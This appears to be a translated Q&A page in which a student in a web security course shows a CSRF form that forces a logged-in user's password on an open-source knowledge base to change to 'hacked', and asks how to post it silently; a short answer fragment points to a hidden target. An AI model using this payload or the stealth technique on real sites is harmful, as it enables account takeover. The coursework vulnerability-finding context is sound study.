Security 如何构造跨站点请求伪造攻击？_Security

Security 如何构造跨站点请求伪造攻击？

security

Security 如何构造跨站点请求伪造攻击？,security,Security,我正在上一门网络安全课程，我们的任务之一是在开源项目中发现安全漏洞我正在工作的这个项目似乎容易受到CSRF的影响。我构造了以下攻击，其中我欺骗用户单击包含以下内容的链接： <form onsubmit="top." action="http://localhost/aphpkb/change_password.php" method="post"> <input type="hidden" val

我正在上一门网络安全课程，我们的任务之一是在开源项目中发现安全漏洞

我正在工作的这个项目似乎容易受到CSRF的影响。我构造了以下攻击，其中我欺骗用户单击包含以下内容的链接：

<form onsubmit="top." action="http://localhost/aphpkb/change_password.php" method="post">
<input type="hidden" value="hacked" name="password1" size="20" maxlength="20" />
<input type="hidden" value="hacked" name="password2" size="20" maxlength="20" />
<input type="submit" name="submit" value="Click here for a new Camry!!" />
</form>

当用户当前登录到该站点时，此攻击会起作用并更改该站点的密码。。但是，页面的结果会呈现给最终用户。我尝试了各种方法“悄悄地”发布表单（基于PHP的方法和基于JS的方法），但都没有成功

是否有人能提供一些指导，也许能为我指明正确的方向，告诉我是否可以以静默方式发布到另一个网站？

将表单的

目标设置为隐藏